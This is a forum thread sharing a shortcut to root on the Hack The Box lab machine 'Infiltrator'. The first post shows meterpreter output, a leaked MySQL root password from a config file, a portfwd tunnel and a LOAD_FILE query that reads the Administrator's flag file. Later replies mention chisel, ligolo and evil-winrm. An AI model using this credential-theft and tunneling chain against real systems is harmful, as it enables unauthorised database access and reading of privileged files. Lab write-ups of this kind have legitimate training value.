HTB Infiltrator get root
by HTBcracker - Sunday September 1, 2024 at 05:17 PM
#1
credentials leak for mysql
meterpreter > dir Listing: C:\ProgramData\Output Messenger Server\Temp ==================================================== Mode              Size      Type  Last modified              Name ----              ----      ----  -------------              ---- 100666/rw-rw-rw-  15702539  fil  2024-02-19 16:51:30 +0100  OutputMessengerApache.zip 100666/rw-rw-rw-  25477937  fil  2024-02-19 16:51:52 +0100  OutputMessengerMysql.zip 100666/rw-rw-rw-  3369187  fil  2024-02-19 16:52:02 +0100  OutputWall.zip 100777/rwxrwxrwx  6554576  fil  2024-02-19 16:51:12 +0100  vcredist_x86.exe

~ ls OutputMessengerMysql.zip  OutputMysql.ini  backup  data  mysql  settings ~ cat OutputMysql.ini --- [DBCONFIG] DBUsername=root DBPassword=ibWijteig5 DBName=outputwall ---

portforward mysql
meterpreter > portfwd add -l 14406 -p 14406 -r 10.129.14.214 [*]Forward TCP relay created: (local) :14406 -> (remote) 10.129.14.214:14406
[*]
connect to mysql
~ mysql -h 127.0.0.1 -P 14406 -u root --skip-ssl -p Enter password: Welcome to the MariaDB monitor.  Commands end with ; or \g. Your MariaDB connection id is 4 Server version: 10.1.19-MariaDB mariadb.org binary distribution Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others. Support MariaDB developers by giving a star at https://github.com/MariaDB/server Type 'help;' or '\h' for help. Type '\c' to clear the current input statement. MariaDB [(none)]>
[*]
load root file
MariaDB [(none)]> SELECT LOAD_FILE('C:\\Users\\Administrator\\Desktop\\root.txt'); +----------------------------------------------------------+ | LOAD_FILE('C:\\Users\\Administrator\\Desktop\\root.txt') | +----------------------------------------------------------+ | REDACTED                       | +----------------------------------------------------------+ 1 row in set (1.674 sec)
Ban reason: Malware. /Thread-Shellter-Pro-v4-7-x86-NOT-WORKING-crack (Permanent)
Reply
#2
Thanks for sharing this! Awsome work! But defenitely not intended way!
Reply
#3
Kinda sad, but It seems not to work anymore, tunneling active, yet no reply from mysql when connecting
Reply
#4
(09-02-2024, 03:38 PM)sssstarlight Wrote: Kinda sad, but It seems not to work anymore, tunneling active, yet no reply from mysql  when connecting

me too ... i will try with chisel
Reply
#5
Managed to get it? Any luck?
Reply
#6
how do you set up msf for it?

i am able to login winrm_svc with evil-winrm but ig there's no method to portfwd so how should i login using metasploit
Reply
#7
(09-02-2024, 06:54 PM)awwliveyet Wrote: how do you set up msf for it?

i am able to login winrm_svc with evil-winrm but ig there's no method to portfwd so how should i login using metasploit
I solve it with ligolo ... got root flag
Reply


Possibly Related Threads…
Thread Author Replies Views Last Post
  [FREE] 300+ Writeups PDF HackTheBox/HTB premium retired Tamarisk 360 90,821 03-28-2026, 09:28 AM
Last Post: catsweet
  [FREE] HTB-ProLabs APTLABS Just Flags kewlsunny 23 4,288 03-28-2026, 03:30 AM
Last Post: lulaladrow
  [MEGALEAK] HackTheBox ProLabs, Fortress, Endgame - Alchemy, 250 Flags, leak htb-bot htb-bot 87 9,451 03-27-2026, 07:22 PM
Last Post: stn
  HTB Eloquia User and Root Flags - Insane Box 69646B 13 2,274 03-27-2026, 06:14 PM
Last Post: vlxw
  HTB - ALL Challenges you Stuck in osamy7593 2 2,572 03-27-2026, 04:24 PM
Last Post: catsweet



 Users browsing this thread: 1 Guest(s)